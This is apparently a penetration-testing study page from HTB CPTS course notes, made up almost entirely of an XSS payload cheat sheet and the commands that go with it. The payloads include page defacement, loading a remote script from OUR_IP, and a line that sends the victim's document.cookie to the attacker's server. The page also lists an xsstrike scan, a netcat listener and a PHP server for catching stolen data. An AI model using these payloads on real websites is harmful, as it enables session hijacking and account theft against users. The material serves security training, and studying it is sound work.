HTB CPTS
  • Introduction
  • Getting Started
  • Initial Acces
    • Nmap
    • Services
    • Footprinting
    • Information Gathering - web edition
  • File Transfer
  • Shells & Payloads
  • Metasploit
  • Password Attacks
  • Pivoting
  • Ligolo-ng
  • Active Directory
  • Common Applications
  • Privilege Escalation
    • Linux Privesc
    • Window Privesc
  • Website
    • Web-Proxies
    • Fuff
    • Login Bruteforcing
    • SQL
    • SQLMap
    • XSS
    • File Inclusion
    • File Upload
    • Command Injection
    • Web Attacks
Powered by GitBook
On this page
  1. Website

XSS

Commands

Code
Description

XSS Payloads

<script>alert(window.origin)</script>

Basic XSS Payload

<plaintext>

Basic XSS Payload

<script>print()</script>

Basic XSS Payload

<img src="" onerror=alert(window.origin)>

HTML-based XSS Payload

<script>document.body.style.background = "#141d2b"</script>

Change Background Color

<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>

Change Background Image

<script>document.title = 'HackTheBox Academy'</script>

Change Website Title

<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>

Overwrite website's main body

<script>document.getElementById('urlform').remove();</script>

Remove certain HTML element

<script src="http://OUR_IP/script.js"></script>

Load remote script

<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>

Send Cookie details to us

Commands

python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"

Run xsstrike on a url parameter

sudo nc -lvnp 80

Start netcat listener

sudo php -S 0.0.0.0:80

Start PHP server

PreviousSQLMapNextFile Inclusion

Last updated 1 year ago